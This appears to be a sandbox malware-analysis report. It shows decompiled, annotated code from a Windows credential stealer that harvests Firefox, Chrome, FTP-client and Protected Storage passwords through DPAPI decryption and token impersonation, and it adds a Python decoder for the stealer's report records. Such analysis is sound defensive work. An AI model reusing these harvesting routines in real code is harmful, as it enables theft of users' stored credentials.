                                                                    									_t58 =  *0x416020(_v8, "SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins", 0xffffffff,  &_v12, 0);
                                                                    									_t89 = _t88 + 0x14;
                                                                    									if(_t58 == 0) {
                                                                    										while(1) {
                                                                    											_t61 =  *0x416024(_v12);
                                                                    											_t89 = _t89 + 4;
                                                                    											if(_t61 != 0x64) {
                                                                    												break;
                                                                    											}
                                                                    											_t64 = E0040923F(_v12, 0,  &_v16);
                                                                    											if(_t64 != 0 && _v16 != 0 &&  *_t64 != 0) {
                                                                    												_t65 = E004018CF(_v16 + 1);
                                                                    												_t86 = _t64;
                                                                    												_v28 = _t65;
                                                                    												_t66 = E00401906(_t86, _v28, _v16);
                                                                    												_v20 = 0;
                                                                    												_v24 = 0;
                                                                    												if( *0x416030 != 0) {
                                                                    													if( *0x416030 != 1) {
                                                                    														if( *0x416030 == 2) {
                                                                    															_t66 = 0;
                                                                    														}
                                                                    													} else {
                                                                    														_push("ftp.");
                                                                    														L0041066A();
                                                                    														_t66 = StrCmpNIA(_v28, "ftp.", _t66);
                                                                    													}
                                                                    												} else {
                                                                    													_push("ftp://");
                                                                    													L0041066A();
                                                                    													_t82 = StrCmpNIA(_v28, "ftp://", _t66);
                                                                    													if(_t82 != 0) {
                                                                    														_push("http://");
                                                                    														L0041066A();
                                                                    														_t82 = StrCmpNIA(_v28, "http://", _t82);
                                                                    													}
                                                                    													_t66 = _t82;
                                                                    													if(_t66 != 0) {
                                                                    														_push("https://");
                                                                    														L0041066A();
                                                                    														_t66 = StrCmpNIA(_v28, "https://", _t66);
                                                                    													}
                                                                    												}
                                                                    												if(_t66 == 0) {
                                                                    													_v20 = E00409142(_t83, E0040923F(_v12, 1,  &_v16), _v16);
                                                                    													_v24 = E00409142(_t83, E0040923F(_v12, 2,  &_v16), _v16);
                                                                    													if(_v28 != 0 && _v24 != 0) {
                                                                    														E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0000), _a4, _v28), _a4, _v20), _a4, _v24);
                                                                    													}
                                                                    												}
                                                                    												E004018B8(_v20);
                                                                    												E004018B8(_v24);
                                                                    												E004018B8(_v28);
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    									 *0x41601c(_v8);
                                                                    								}
                                                                    							}
                                                                    							return E00409119();
                                                                    						} else {
                                                                    							return _t49;
                                                                    						}
                                                                    					} else {
                                                                    						return _t47;
                                                                    					}
                                                                    				} else {
                                                                    					return _t45;
                                                                    				}
                                                                    			}

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins$ftp.$ftp://$http://$https://$mozsqlite3.dll$sqlite3.dll
                                                                    • API String ID: 0-3560805513
                                                                    • Opcode ID: 1305b2d7dbd87bdcba0efca0d3b8a8fe3f3a9e84d79a5bf18c92add6ae8d1bcf
                                                                    • Instruction ID: 0b43bc70ff64a1734e0ce49f563043eae91eb0b2240d540db883058d32c88b0f
                                                                    • Opcode Fuzzy Hash: 1305b2d7dbd87bdcba0efca0d3b8a8fe3f3a9e84d79a5bf18c92add6ae8d1bcf
                                                                    • Instruction Fuzzy Hash: 02512870900109BADF11AFA1CD06AEE7F75AB54349F10443BB512B01E3D7B98EA1EA5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040AC3E(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                    				/* FTP-client site stealer, one site per call.
                                                                    				   _a4: output report buffer, _a8: the client's settings key, _a12: site index.
                                                                    				   Reads the "SiteServer <n>\..." values, DPAPI-decrypts user name and
                                                                    				   password (E0040AB24 wraps CryptUnprotectData) and appends a 0xbeef0010
                                                                    				   record to the report. */
                                                                    				CHAR* _v8;
                                                                    				CHAR* _v12;
                                                                    				CHAR* _v16;
                                                                    				CHAR* _v20;
                                                                    				CHAR* _v24;
                                                                    				CHAR* _v28;
                                                                    				CHAR* _v32;
                                                                    				intOrPtr _v36;
                                                                    				intOrPtr _v40;
                                                                    				intOrPtr _v44;
                                                                    				intOrPtr _v48;
                                                                    				intOrPtr _v52;
                                                                    				intOrPtr* _v56;
                                                                    				char _v60;
                                                                    				char _v64;
                                                                    				char _v68;
                                                                    
                                                                    				/* seven 0x2000-byte scratch buffers (E004018CF wraps LocalAlloc) */
                                                                    				_v8 = E004018CF(0x2000);
                                                                    				_v12 = E004018CF(0x2000);
                                                                    				_v16 = E004018CF(0x2000);
                                                                    				_v20 = E004018CF(0x2000);
                                                                    				_v24 = E004018CF(0x2000);
                                                                    				_v28 = E004018CF(0x2000);
                                                                    				_v32 = E004018CF(0x2000);
                                                                    				/* value names; user name and password live under the "<key>\Keychain" subkey */
                                                                    				wsprintfA(_v8, "SiteServer %d\\Host", _a12);
                                                                    				wsprintfA(_v12, "SiteServer %d\\WebUrl", _a12);
                                                                    				wsprintfA(_v16, "SiteServer %d\\Remote Directory", _a12);
                                                                    				wsprintfA(_v20, "SiteServer %d-User", _a12);
                                                                    				wsprintfA(_v24, "SiteServer %d-User PW", _a12);
                                                                    				wsprintfA(_v28, "%s\\Keychain", _a8);
                                                                    				wsprintfA(_v32, "SiteServer %d\\SFTP", _a12);
                                                                    				/* E00401D71 reads one value each; the last call also returns the value type in _v68 */
                                                                    				_v36 = E00401D71( *0x414869, _a8, _v8, 0);
                                                                    				_v40 = E00401D71( *0x414869, _a8, _v12, 0);
                                                                    				_v44 = E00401D71( *0x414869, _a8, _v16, 0);
                                                                    				_v48 = E00401D71( *0x414869, _v28, _v20, 0);
                                                                    				_v52 = E00401D71( *0x414869, _v28, _v24, 0);
                                                                    				_v56 = E00401D71( *0x414869, _a8, _v32,  &_v68);
                                                                    				/* host, user and password are mandatory, and both credentials must decrypt
                                                                    				   (E0040AB24 returns non-zero and a non-zero size in _v64 / _v60) */
                                                                    				if(_v36 != 0 && _v48 != 0 && _v52 != 0 && E0040AB24( &_v64, _v48,  &_v64) != 0 && _v64 != 0 && E0040AB24( &_v60, _v52,  &_v60) != 0 && _v60 != 0) {
                                                                    					/* record tag 0xbeef0010, then host, web URL and remote directory (E004015CB uses lstrlen) */
                                                                    					E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0010), _a4, _v36), _a4, _v40), _a4, _v44);
                                                                    					/* decrypted user name and password with their sizes */
                                                                    					E0040159F(_a4, _v48, _v64);
                                                                    					E0040159F(_a4, _v52, _v60);
                                                                    					/* SFTP flag only when the value exists and has type 4 (a DWORD), otherwise 0 */
                                                                    					if(_v56 == 0 || _v68 != 4) {
                                                                    						E00401569(_a4, 0);
                                                                    					} else {
                                                                    						E00401569(_a4,  *_v56);
                                                                    					}
                                                                    				}
                                                                    				/* release the scratch buffers and the values read above */
                                                                    				E004018B8(_v8);
                                                                    				E004018B8(_v12);
                                                                    				E004018B8(_v16);
                                                                    				E004018B8(_v20);
                                                                    				E004018B8(_v24);
                                                                    				E004018B8(_v28);
                                                                    				E004018B8(_v32);
                                                                    				E004018B8(_v36);
                                                                    				E004018B8(_v40);
                                                                    				E004018B8(_v44);
                                                                    				E004018B8(_v48);
                                                                    				E004018B8(_v52);
                                                                    				return E004018B8(_v56);
                                                                    			}
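The listing above shows how a site record is assembled (E00401569, E004015CB, E0040159F) but not the resulting byte layout. The following Python is an added example, not the report's output or the malware's own code: it encodes and decodes one such record under an assumed layout in which each helper appends a little-endian DWORD and every string or blob is prefixed with its DWORD length (E004015CB derives the length with lstrlen, E0040159F takes it as an argument). The tag name, the schema table and the sample values are constructed for the example; the layout is the assumption to confirm against a captured exfiltration before relying on the decoder.

```python
import struct
from typing import Dict, List, Optional, Tuple

# ASSUMED layout, inferred from the helper names and their subcalls (not stated by the report):
#   E00401569(report, dword)     -> little-endian DWORD
#   E004015CB(report, str)       -> DWORD(lstrlen(str)) + bytes, no terminator
#   E0040159F(report, ptr, len)  -> DWORD(len) + raw bytes
TAG_FTP_SITE = 0xBEEF0010          # the tag E0040AC3E writes first

# Field kinds: d = DWORD, s = length-prefixed string, b = length-prefixed blob.
# Order follows the emit sequence in E0040AC3E: host, web URL, remote dir, user, password, SFTP flag.
SCHEMAS: Dict[int, str] = {TAG_FTP_SITE: "sssbbd"}

# The stealer allocates 0x2000-byte buffers for its strings; use that as a parsing sanity bound.
MAX_FIELD = 0x2000


def _dword(value: int) -> bytes:
    return struct.pack("<I", value & 0xFFFFFFFF)


def add_dword(report: bytearray, value: int) -> bytearray:
    """Assumed mirror of E00401569."""
    report += _dword(value)
    return report


def add_string(report: bytearray, text: Optional[str]) -> bytearray:
    """Assumed mirror of E004015CB. lstrlen(NULL) is 0 on Windows, so a value that
    E00401D71 failed to read (web URL, remote dir) becomes an empty string."""
    data = (text or "").encode("latin-1")
    report += _dword(len(data)) + data
    return report


def add_blob(report: bytearray, data: bytes) -> bytearray:
    """Assumed mirror of E0040159F: explicit length, e.g. the DPAPI plaintext size."""
    report += _dword(len(data)) + bytes(data)
    return report


def encode_ftp_site(host: str, web_url: Optional[str], remote_dir: Optional[str],
                    user: bytes, password: bytes, sftp_flag: int) -> bytes:
    """Build one 0xbeef0010 record in the field order E0040AC3E uses."""
    report = bytearray()
    add_dword(report, TAG_FTP_SITE)
    for text in (host, web_url, remote_dir):
        add_string(report, text)
    add_blob(report, user)
    add_blob(report, password)
    add_dword(report, sftp_flag)   # E0040AC3E writes 0 unless the SFTP value is a DWORD
    return bytes(report)


class _Reader:
    def __init__(self, data: bytes) -> None:
        self.data, self.pos = data, 0

    def dword(self) -> int:
        if self.pos + 4 > len(self.data):
            raise ValueError("truncated DWORD at offset %d" % self.pos)
        (value,) = struct.unpack_from("<I", self.data, self.pos)
        self.pos += 4
        return value

    def blob(self) -> bytes:
        length = self.dword()
        if length > MAX_FIELD or self.pos + length > len(self.data):
            raise ValueError("bad field length %d at offset %d" % (length, self.pos - 4))
        chunk = self.data[self.pos:self.pos + length]
        self.pos += length
        return bytes(chunk)


def decode(data: bytes) -> List[Tuple[int, list]]:
    """Parse a stream of tagged records; raises ValueError on unknown tags or truncation."""
    reader, records = _Reader(data), []
    while reader.pos < len(data):
        tag = reader.dword()
        schema = SCHEMAS.get(tag)
        if schema is None:
            raise ValueError("unknown record tag 0x%08x at offset %d" % (tag, reader.pos - 4))
        fields: list = []
        for kind in schema:
            if kind == "d":
                fields.append(reader.dword())
            elif kind == "s":
                fields.append(reader.blob().decode("latin-1"))
            else:
                fields.append(reader.blob())
        records.append((tag, fields))
    return records


def is_well_formed(data: bytes) -> bool:
    """True when the whole buffer parses; a truncated or foreign record is rejected, not guessed."""
    try:
        decode(data)
        return True
    except ValueError:
        return False


# Constructed sample: what E0040AC3E would emit for one site (all values are made up).
SAMPLE = encode_ftp_site("ftp.example.test", None, "/htdocs", b"alice", b"hunter2", 1)
```

The bounded reads in `_Reader.blob` matter more than the schema: a decoder fed a partial network capture must fail closed rather than read past the buffer, and the 0x2000 bound comes straight from the allocation sizes in the listing.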

                                                                    APIs
                                                                      • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                                    • wsprintfA.USER32 ref: 0040ACAA
                                                                    • wsprintfA.USER32 ref: 0040ACBD
                                                                    • wsprintfA.USER32 ref: 0040ACD0
                                                                    • wsprintfA.USER32 ref: 0040ACE3
                                                                    • wsprintfA.USER32 ref: 0040ACF6
                                                                    • wsprintfA.USER32 ref: 0040AD09
                                                                    • wsprintfA.USER32 ref: 0040AD1C
                                                                      • Part of subcall function 0040AB24: lstrlen.KERNEL32(?), ref: 0040AB39
                                                                      • Part of subcall function 0040AB24: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040ABF1
                                                                      • Part of subcall function 0040AB24: LocalFree.KERNEL32(00000000), ref: 0040AC24
                                                                      • Part of subcall function 004015CB: lstrlen.KERNEL32(00000000), ref: 004015D7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: wsprintf$Locallstrlen$AllocCryptDataFreeUnprotect
                                                                    • String ID: %s\Keychain$SiteServer %d-User$SiteServer %d-User PW$SiteServer %d\Host$SiteServer %d\Remote Directory$SiteServer %d\SFTP$SiteServer %d\WebUrl
                                                                    • API String ID: 3846021373-1012938452
                                                                    • Opcode ID: 2d1ca3080265c7f42f5185a726124574c918e8fca9382bae30428a6d71d2bfa4
                                                                    • Instruction ID: 1bba98e3d6ebe3bfaf8854b06724a853d0d9b8747224fc931b02987156b93079
                                                                    • Opcode Fuzzy Hash: 2d1ca3080265c7f42f5185a726124574c918e8fca9382bae30428a6d71d2bfa4
                                                                    • Instruction Fuzzy Hash: 6861B532940208BAEF127FA1DC42EEDBA72AF04344F14853AF914741F1D77A5AA4EB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 74%
                                                                    			E0040F545(void* __ecx, intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                    				/* Protected Storage (PStore) item reader.
                                                                    				   _a4/_a8: item type and subtype GUIDs, _a12: item name (UTF-16), _a16: passed
                                                                    				   through to E0040F456, _a20: IPStore interface pointer.
                                                                    				   L00410712 is lstrcmpi (0 on a match, see the API list below); L0041079C is the
                                                                    				   OLE32 import that frees the item data, i.e. CoTaskMemFree as the PStore
                                                                    				   contract requires. */
                                                                    				char _v1028;
                                                                    				char _v2052;
                                                                    				char _v3076;
                                                                    				int _v3080;
                                                                    				int _v3084;
                                                                    				intOrPtr _v3088;
                                                                    				char _v3092;
                                                                    				char _v3096;
                                                                    				char _v3100;
                                                                    				intOrPtr _v3104;
                                                                    				void* _t56;
                                                                    				char* _t57;
                                                                    				char* _t58;
                                                                    				char* _t59;
                                                                    				char* _t60;
                                                                    				void* _t61;
                                                                    
                                                                    				_t61 = __ecx;
                                                                    				/* resolve the type and subtype GUIDs to their ANSI display names */
                                                                    				E0040A2A9(_a4,  &_v1028, _a20);
                                                                    				E0040A2F4(_a4, _a8,  &_v2052, _a20);
                                                                    				WideCharToMultiByte(0, 0, _a12, 0xffffffff,  &_v3076, 0x3ff, 0, 0);
                                                                    				/* PST_PROMPTINFO: cbSize 0x10, dwPromptFlags 2 (PST_PF_NEVER_SHOW), no window, no prompt text */
                                                                    				_v3092 = 0x10;
                                                                    				_v3088 = 2;
                                                                    				_v3084 = 0;
                                                                    				_v3080 = 0;
                                                                    				/* vtable slot 0x44 / 4 = 17 is IPStore::ReadItem(key, type, subtype, name, &cbData, &pbData, &promptInfo, flags) */
                                                                    				_t56 =  *((intOrPtr*)( *_a20 + 0x44))(_a20, 0, _a4, _a8, _a12,  &_v3100,  &_v3096,  &_v3092, 0);
                                                                    				if(_v3100 == 0 || _v3096 == 0) {
                                                                    					/* no size or no data: nothing to report */
                                                                    					return _t56;
                                                                    				} else {
                                                                    					/* only the "identification" and "identitymgr" types are of interest */
                                                                    					_push("identification");
                                                                    					_t57 =  &_v1028;
                                                                    					_push(_t57);
                                                                    					L00410712();
                                                                    					if(_t57 == 0) {
                                                                    						L4:
                                                                    						/* the subtype selects the record tag: 0xbeef0005 inetcomm server passwords,
                                                                    						   0xbeef0006 outlook account manager passwords, 0xbeef0007 identities;
                                                                    						   any other subtype jumps to L10 and is discarded */
                                                                    						_v3104 = 0xbeef0005;
                                                                    						_push("inetcomm server passwords");
                                                                    						_t58 =  &_v2052;
                                                                    						_push(_t58);
                                                                    						L00410712();
                                                                    						if(_t58 == 0) {
                                                                    							L7:
                                                                    							/* last argument: 1 for the two password subtypes, 0 for identities */
                                                                    							if(_v3104 != 0xbeef0007) {
                                                                    								_t59 = E0040F456(_t61, _v3104, _a12, _v3096, _v3100, _a16, _a8, 1);
                                                                    							} else {
                                                                    								_t59 = E0040F456(_t61, _v3104, _a12, _v3096, _v3100, _a16, _a8, 0);
                                                                    							}
                                                                    							L10:
                                                                    							/* free the item data returned by ReadItem */
                                                                    							_push(_v3096);
                                                                    							L0041079C();
                                                                    							return _t59;
                                                                    						}
                                                                    						_v3104 = 0xbeef0006;
                                                                    						_push("outlook account manager passwords");
                                                                    						_t60 =  &_v2052;
                                                                    						_push(_t60);
                                                                    						L00410712();
                                                                    						if(_t60 == 0) {
                                                                    							goto L7;
                                                                    						}
                                                                    						_v3104 = 0xbeef0007;
                                                                    						_push("identities");
                                                                    						_t59 =  &_v2052;
                                                                    						_push(_t59);
                                                                    						L00410712();
                                                                    						if(_t59 != 0) {
                                                                    							goto L10;
                                                                    						}
                                                                    						goto L7;
                                                                    					}
                                                                    					_push("identitymgr");
                                                                    					_t59 =  &_v1028;
                                                                    					_push(_t59);
                                                                    					L00410712();
                                                                    					if(_t59 != 0) {
                                                                    						goto L10;
                                                                    					}
                                                                    					goto L4;
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 0040A2A9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2E2
                                                                      • Part of subcall function 0040A2A9: 73D5A680.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2EB
                                                                      • Part of subcall function 0040A2F4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A330
                                                                      • Part of subcall function 0040A2F4: 73D5A680.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A339
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040F58E
                                                                    • lstrcmpi.KERNEL32(?,identification), ref: 0040F60E
                                                                    • lstrcmpi.KERNEL32(?,identitymgr), ref: 0040F623
                                                                    • lstrcmpi.KERNEL32(?,inetcomm server passwords), ref: 0040F646
                                                                    • lstrcmpi.KERNEL32(?,outlook account manager passwords), ref: 0040F665
                                                                    • lstrcmpi.KERNEL32(?,identities), ref: 0040F684
                                                                    • 73D5A680.OLE32(00000000,?,inetcomm server passwords,?,identification), ref: 0040F6E5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcmpi$A680ByteCharMultiWide
                                                                    • String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
                                                                    • API String ID: 4057083374-4287852900
                                                                    • Opcode ID: 1ce6b7ace68d01d369585ed74b018ba19da90517791f3557c33866cb3dfc0c10
                                                                    • Instruction ID: 5defee22b8e27fb871682b6a3356ac2aeb954d56b4ddb1cb6db0f340d7122943
                                                                    • Opcode Fuzzy Hash: 1ce6b7ace68d01d369585ed74b018ba19da90517791f3557c33866cb3dfc0c10
                                                                    • Instruction Fuzzy Hash: FF416F7180021DABEF219F50CD41FDA7779BF05304F0045B6B604751E2DBB99AE99F98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 86%
                                                                    			E00402E2F(void* __ebx) {
                                                                    				/* Locate explorer.exe in the caller's session. The routine walks a process
                                                                    				   snapshot with Process32Next (the PROCESSENTRY32 sits at _t48 - 0x134, so
                                                                    				   szExeFile is _t48 - 0x110 and th32ProcessID is _t48 - 0x12c), then calls a
                                                                    				   dynamically resolved API through *0x414aef with (PID, &out) and compares the
                                                                    				   result with a value cached at _t48 - 0xc; this is consistent with
                                                                    				   ProcessIdToSessionId. A match is opened with OpenProcess(0x2000000 =
                                                                    				   PROCESS_QUERY_LIMITED_INFORMATION). The decompiler has emitted the loop head
                                                                    				   twice (label L14). */
                                                                    				int _t23;
                                                                    				void* _t31;
                                                                    				void* _t34;
                                                                    				void* _t43;
                                                                    				void* _t45;
                                                                    				int _t47;
                                                                    				void* _t48;
                                                                    
                                                                    				_t45 = __ebx;
                                                                    				while(1) {
                                                                    					L14:
                                                                    					_t23 = Process32Next( *(_t48 - 0x138), _t48 - 0x134);
                                                                    					L1:
                                                                    					if(_t23 != 0) {
                                                                    						L2:
                                                                    						/* image name filter */
                                                                    						if(StrStrIA(_t48 - 0x110, "explorer.exe") == 0) {
                                                                    							L14:
                                                                    							_t23 = Process32Next( *(_t48 - 0x138), _t48 - 0x134);
                                                                    							goto L1;
                                                                    						} else {
                                                                    							L3:
                                                                    							/* session check: skip explorer.exe instances belonging to other sessions */
                                                                    							 *(_t48 - 0x13c) = 0;
                                                                    							_t31 =  *0x414aef( *(_t48 - 0x12c), _t48 - 0x13c);
                                                                    							_t47 =  *(_t48 - 0x13c);
                                                                    							if(_t31 == 0 || _t47 !=  *((intOrPtr*)(_t48 - 0xc))) {
                                                                    								continue;
                                                                    							} else {
                                                                    								L5:
                                                                    								/* PROCESS_QUERY_LIMITED_INFORMATION is enough to read the token / session of explorer.exe */
                                                                    								_t34 = OpenProcess(0x2000000, 0,  *(_t48 - 0x12c));
                                                                    								if(_t34 == 0) {
                                                                    									continue;
                                                                    								} else {
                                                                    									L6:
                                                                    									 *(_t48 - 8) = _t34;
                                                                    									if(OpenProcessToken( *(_t48 - 8), 0x201eb, _t48 - 4) == 0) {
                                                                    										CloseHandle( *(_t48 - 8));
                                                                    										continue;
                                                                    										do {
                                                                    											do {
                                                                    												do {
                                                                    													goto L14;
                                                                    												} while (StrStrIA(_t48 - 0x110, "explorer.exe") == 0);
                                                                    												goto L3;
                                                                    											} while (_t31 == 0 || _t47 !=  *((intOrPtr*)(_t48 - 0xc)));
                                                                    											goto L5;
                                                                    										} while (_t34 == 0);
                                                                    										goto L6;
                                                                    									} else {
                                                                    										if(ImpersonateLoggedOnUser( *(_t48 - 4)) == 0) {
                                                                    											CloseHandle( *(_t48 - 4));
                                                                    											CloseHandle( *(_t48 - 8));
                                                                    											while(1) {
                                                                    												L14:
                                                                    												_t23 = Process32Next( *(_t48 - 0x138), _t48 - 0x134);
                                                                    												goto L1;
                                                                    											}
                                                                    										} else {
                                                                    											_t45 = _t45 + 1;
                                                                    											 *(_t48 - 0x140) = 0;
                                                                    											_t43 = _t48 - 0x140;
                                                                    											_push(_t43);
                                                                    											_push(0xf003f);
                                                                    											L004107E4();
                                                                    											if(_t43 == 0 &&  *(_t48 - 0x140) != 0) {
                                                                    												 *0x414869 =  *(_t48 - 0x140);
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					CloseHandle( *(_t48 - 0x138));
                                                                    					return _t45;
                                                                    				}
                                                                    			}


                                                                    APIs
                                                                    • StrStrIA.SHLWAPI(?,explorer.exe,?,00000128,00000002,00000000), ref: 00402D7B
                                                                    • ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,00000128,?,explorer.exe,?,00000128,00000002,00000000), ref: 00402D9F
                                                                    • OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402DC9
                                                                    • OpenProcessToken.ADVAPI32(?,000201EB,?,02000000,00000000,?), ref: 00402DE1
                                                                    • ImpersonateLoggedOnUser.ADVAPI32(?), ref: 00402DEE
                                                                    • RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402E0F
                                                                    • CloseHandle.KERNEL32(?), ref: 00402E34
                                                                    • CloseHandle.KERNEL32(?,?), ref: 00402E3C
                                                                    • CloseHandle.KERNEL32(?), ref: 00402E46
                                                                    • Process32Next.KERNEL32 ref: 00402E58
                                                                    • CloseHandle.KERNEL32(?,?,00000128,00000002,00000000), ref: 00402E68
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle$OpenProcess$User$CurrentImpersonateLoggedNextProcess32SessionToken
                                                                    • String ID: explorer.exe
                                                                    • API String ID: 3144406365-3187896405
                                                                    • Opcode ID: 49e4cd7d7ed3542de117e9f293d799c5d97a6a6d7919811d6a423e5cfa3976f1
                                                                    • Instruction ID: 32ad39438d36eb2c4f1d55e69c665a30fc6644003667a0189b3d930331164acb
                                                                    • Opcode Fuzzy Hash: 49e4cd7d7ed3542de117e9f293d799c5d97a6a6d7919811d6a423e5cfa3976f1
                                                                    • Instruction Fuzzy Hash: 8F210031940118AADF219B61DD49BEEB7B4AB08344F1044F6E209B11E0DBB89FC5DF99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 23%
                                                                    			E0040BA3C(char* _a4, intOrPtr _a8) {
                                                                    				void* _t12;
                                                                    				char* _t15;
                                                                    				void* _t16;
                                                                    				void* _t17;
                                                                    				void* _t19;
                                                                    				void* _t20;
                                                                    				char* _t24;
                                                                    
                                                                    				E004028FE(_t12, _a4);
                                                                    				_t15 = StrStrIA(_a4, 0x4164c1);
                                                                    				if(_t15 != 0) {
                                                                    					 *_t15 = 0;
                                                                    					_t16 = E004028FE(_t15, _a4);
                                                                    					_t24 = "CONSTRAINT";
                                                                    					while(1) {
                                                                    						_push(_a4);
                                                                    						_push(_t24);
                                                                    						L00410712();
                                                                    						_t17 = _t16;
                                                                    						if(_t17 == 0) {
                                                                    							break;
                                                                    						}
                                                                    						asm("cld");
                                                                    						_t16 = 0;
                                                                    						asm("repne scasb");
                                                                    						if( *_t24 != 0) {
                                                                    							continue;
                                                                    						} else {
                                                                    							_push(_a4);
                                                                    							L0041066A();
                                                                    							if(0 != 0) {
                                                                    								_push("origin_url");
                                                                    								_push(_a4);
                                                                    								L00410712();
                                                                    								_t19 = 0;
                                                                    								if(0 == 0) {
                                                                    									_push(_a8);
                                                                    									_pop( *0x418e9c);
                                                                    								}
                                                                    								_push("password_value");
                                                                    								_push(_a4);
                                                                    								L00410712();
                                                                    								_t20 = _t19;
                                                                    								if(_t20 == 0) {
                                                                    									_push(_a8);
                                                                    									_pop( *0x418ea0);
                                                                    								}
                                                                    								_push("username_value");
                                                                    								_push(_a4);
                                                                    								L00410712();
                                                                    								if(_t20 == 0) {
                                                                    									_push(_a8);
                                                                    									_pop( *0x418ea4);
                                                                    								}
                                                                    								return 1;
                                                                    							} else {
                                                                    								return 0;
                                                                    							}
                                                                    						}
                                                                    						goto L15;
                                                                    					}
                                                                    					return _t17;
                                                                    				} else {
                                                                    					return _t15;
                                                                    				}
                                                                    				L15:
                                                                    			}


                                                                    APIs
                                                                      • Part of subcall function 004028FE: lstrlen.KERNEL32(?), ref: 00402932
                                                                    • StrStrIA.SHLWAPI(?,004164C1), ref: 0040BA50
                                                                    • lstrcmpi.KERNEL32(CONSTRAINT,?), ref: 0040BA72
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcmpilstrlen
                                                                    • String ID: CONSTRAINT$origin_url$password_value$username_value
                                                                    • API String ID: 3649823140-2401479949
                                                                    • Opcode ID: 500035ece04242e1ae96020af6f937db67946e234e9f7a9da2f3ebc026f93c9e
                                                                    • Instruction ID: a2f71f728c42a4325fa4d28dd5602d5680443d2fae4c4e77b8657f15ca9af250
                                                                    • Opcode Fuzzy Hash: 500035ece04242e1ae96020af6f937db67946e234e9f7a9da2f3ebc026f93c9e
                                                                    • Instruction Fuzzy Hash: 9C111276310109B9CF116F25EC029DE7F91EB51398B008136F819A51E2D7F9DAE1AB9C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 85%
                                                                    			E00403DE5(void* __eflags, char* _a4, intOrPtr _a8, int _a12, intOrPtr _a16) {
                                                                    				long _v16;
                                                                    				void* _v20;
                                                                    				signed int _v40;
                                                                    				long _v44;
                                                                    				int _v48;
                                                                    				void* _v64;
                                                                    				intOrPtr _v68;
                                                                    				CHAR* _v72;
                                                                    				char* _v76;
                                                                    				int _v80;
                                                                    				long _v84;
                                                                    				long _v88;
                                                                    				int _t71;
                                                                    				int _t77;
                                                                    				int _t82;
                                                                    				void* _t83;
                                                                    				int _t85;
                                                                    				int _t89;
                                                                    
